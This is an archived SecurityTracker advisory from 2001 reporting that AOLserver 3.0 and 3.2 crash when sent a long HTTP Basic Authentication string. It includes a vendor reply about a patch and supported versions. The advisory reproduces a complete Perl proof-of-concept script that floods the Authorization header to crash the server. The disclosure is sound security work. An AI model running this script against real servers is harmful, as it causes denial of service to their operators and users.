SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Web Server/CGI)  >   AOLserver Vendors:   America Online, Inc.
(Patch Information) Re: AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code
SecurityTracker Alert ID:  1002337
SecurityTracker URL:  http://securitytracker.com/id/1002337
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Sep 7 2001
Impact:   Denial of service via network
Fix Available:  Yes  Vendor Confirmed:  Yes  
Version(s): 3.0, 3.2
Description:   It is reported that previous versions of AOLserver can be crashed by remote users and may execute arbitrary code [the code execution ability has not been verified] due to improper handling of long authentication data.

In response to a Basic HTTP Authentication resquest, a remote user can send a long authentication string to cause the server to crash.

A demonstration exploit script is provided:

#!/usr/bin/perl
use IO::Socket;
unless (@ARGV == 1) { die "usage: $0 host ..." }
$host = shift(@ARGV);
$remote = IO::Socket::INET->new( Proto => "tcp",
PeerAddr => $host,
PeerPort => "http(80)",
);
unless ($remote) { die "cannot connect to http daemon on $host" }

$junk = "X" x 2048;
$killme = "GET / HTTP/1.0\nAuthorization: Basic ".$junk."\r\n\r\n";
$remote->autoflush(1);
print $remote $killme;
close $remote;

Impact:   A remote user can cause the server to crash. It has not been confirmed whether this flaw will allow a remote user to cause arbitrary code to be executed.
Solution:   The vendor notes that the AOLserver 3.2 release and earlier are not supported. However,a patch for 3.2 will reportedly be posted to the web site.

The supported versions of AOLserver, versions 3.3.1 and 3.4, are reportedly not vulnerable.

Vendor URL:  www.aolserver.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)

Message History:   This archive entry is a follow-up to the message listed below.
Aug 27 2001 AOLserver Can Be Crashed By Remote Users With a Long HTTP Authentication String And May Execute Arbitrary Code



 Source Message Contents

Subject:  Re: AOLserver 3.0 vulnerability


Hello,

This issue is endemic to the unsupported AOLserver 3.2 release and
earlier. I wrote a patch for 3.2 that addresses this problem which I will
be putting on aolserver.com.

The supported versions of AOLserver, versions 3.3.1 and 3.4, do not have
this bug.

Kris






 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2021, SecurityGlobal.net LLC